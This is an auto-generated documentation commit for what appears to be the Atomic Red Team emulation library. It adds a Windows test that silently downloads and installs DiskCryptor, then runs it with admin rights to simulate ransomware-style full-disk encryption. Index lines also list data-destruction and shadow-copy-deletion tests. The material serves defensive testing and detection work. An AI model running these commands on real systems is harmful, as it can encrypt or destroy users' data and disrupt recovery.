Generated docs from job=generate-docs branch=master [ci skip]

2024-01-20 20:48:23 +00:00
parent fd3e8c05dd
commit c4fea7a287
9 changed files with 135 additions and 2 deletions
@@ -1819,6 +1819,7 @@ impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-49
 impact,T1486,Data Encrypted for Impact,6,Encrypt files using 7z utility - macOS,645f0f5a-ef09-48d8-b9bc-f0e24c642d72,sh
 impact,T1486,Data Encrypted for Impact,7,Encrypt files using openssl utility - macOS,1a01f6b8-b1e8-418e-bbe3-78a6f822759e,sh
 impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
+impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
 impact,T1496,Resource Hijacking,1,FreeBSD/macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,sh
 impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,2,FreeBSD/macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,sh
@@ -1194,6 +1194,7 @@ impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1486,Data Encrypted for Impact,8,Data Encrypted with GPG4Win,4541e2c2-33c8-44b1-be79-9161440f1718,powershell
+impact,T1486,Data Encrypted for Impact,9,Data Encrypt Using DiskCryptor,44b68e11-9da2-4d45-a0d9-893dabd60f30,command_prompt
 impact,T1485,Data Destruction,1,Windows - Overwrite file with SysInternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
@@ -2605,6 +2605,7 @@
  - Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
  - Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
  - Atomic Test #8: Data Encrypted with GPG4Win [windows]
+  - Atomic Test #9: Data Encrypt Using DiskCryptor [windows]
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1496 Resource Hijacking](../../T1496/T1496.md)
  - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos]
@@ -1738,6 +1738,7 @@
 - [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
  - Atomic Test #5: PureLocker Ransom Note [windows]
  - Atomic Test #8: Data Encrypted with GPG4Win [windows]
+  - Atomic Test #9: Data Encrypt Using DiskCryptor [windows]
 - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -106826,6 +106826,45 @@ impact:
        cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
          silentlycontinue | out-null

+          '
+    - name: Data Encrypt Using DiskCryptor
+      auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
+      description: 'DiskCryptor, an open source encryption utility, can be exploited
+        by adversaries for encrypting all disk partitions, including system partitions.
+        This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/.
+        The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor.
+        During the installation process, running dcrypt.exe starts the encryption
+        console. It''s important to note that a system reboot is necessary as part
+        of the installation.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        dcrypt_exe:
+          description: The dcrypt.exe executable from dcrypt_setup.exe
+          type: path
+          default: dcrypt.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'dcrypt_setup will be installed at specified location (#{dcrypt_exe})
+
+          '
+        prereq_command: 'if (Test-Path "${env:ProgramFiles}/dcrypt/#{dcrypt_exe}")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Write-Host Downloading DiskCryptor installer
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://github.com/DavidXanatos/DiskCryptor/releases/download/1.1.846.118/dcrypt_setup_1.1.846.118.exe" -OutFile      "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe"
+          Write-Host Install DiskCryptor
+          Start-Process "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" -Wait -ArgumentList "/s"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"
+
          '
  T1499:
    technique:
@@ -87682,6 +87682,45 @@ impact:
        cleanup_command: 'remove-item ''#{File_to_Encrypt_Location}.gpg'' -force -erroraction
          silentlycontinue | out-null

+          '
+    - name: Data Encrypt Using DiskCryptor
+      auto_generated_guid: 44b68e11-9da2-4d45-a0d9-893dabd60f30
+      description: 'DiskCryptor, an open source encryption utility, can be exploited
+        by adversaries for encrypting all disk partitions, including system partitions.
+        This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/.
+        The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor.
+        During the installation process, running dcrypt.exe starts the encryption
+        console. It''s important to note that a system reboot is necessary as part
+        of the installation.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        dcrypt_exe:
+          description: The dcrypt.exe executable from dcrypt_setup.exe
+          type: path
+          default: dcrypt.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'dcrypt_setup will be installed at specified location (#{dcrypt_exe})
+
+          '
+        prereq_command: 'if (Test-Path "${env:ProgramFiles}/dcrypt/#{dcrypt_exe}")
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          Write-Host Downloading DiskCryptor installer
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "https://github.com/DavidXanatos/DiskCryptor/releases/download/1.1.846.118/dcrypt_setup_1.1.846.118.exe" -OutFile      "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe"
+          Write-Host Install DiskCryptor
+          Start-Process "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" -Wait -ArgumentList "/s"
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"
+
          '
  T1499:
    technique:
@@ -26,6 +26,8 @@ In cloud environments, storage objects within compromised accounts may also be e

 - [Atomic Test #8 - Data Encrypted with GPG4Win](#atomic-test-8---data-encrypted-with-gpg4win)

+- [Atomic Test #9 - Data Encrypt Using DiskCryptor](#atomic-test-9---data-encrypt-using-diskcryptor)
+

 <br/>

@@ -417,4 +419,53 @@ cmd /c "PathToAtomicsFolder\..\ExternalPayloads\gpginstall.exe" /S



+<br/>
+<br/>
+
+## Atomic Test #9 - Data Encrypt Using DiskCryptor
+DiskCryptor, an open source encryption utility, can be exploited by adversaries for encrypting all disk partitions, including system partitions. This tool was identified in a ransomware campaign, as reported on https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/. The documentation for DiskCryptor can be found at https://github.com/DavidXanatos/DiskCryptor. During the installation process, running dcrypt.exe starts the encryption console. It's important to note that a system reboot is necessary as part of the installation.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 44b68e11-9da2-4d45-a0d9-893dabd60f30
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| dcrypt_exe | The dcrypt.exe executable from dcrypt_setup.exe | path | dcrypt.exe|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+""%PROGRAMFILES%\dcrypt"\#{dcrypt_exe}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: dcrypt_setup will be installed at specified location (#{dcrypt_exe})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "${env:ProgramFiles}/dcrypt/#{dcrypt_exe}") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Downloading DiskCryptor installer
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "https://github.com/DavidXanatos/DiskCryptor/releases/download/1.1.846.118/dcrypt_setup_1.1.846.118.exe" -OutFile      "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe"
+Write-Host Install DiskCryptor
+Start-Process "PathToAtomicsFolder\..\ExternalPayloads\dcrypt_setup_1.1.846.118.exe" -Wait -ArgumentList "/s"
+```
+
+
+
+
 <br/>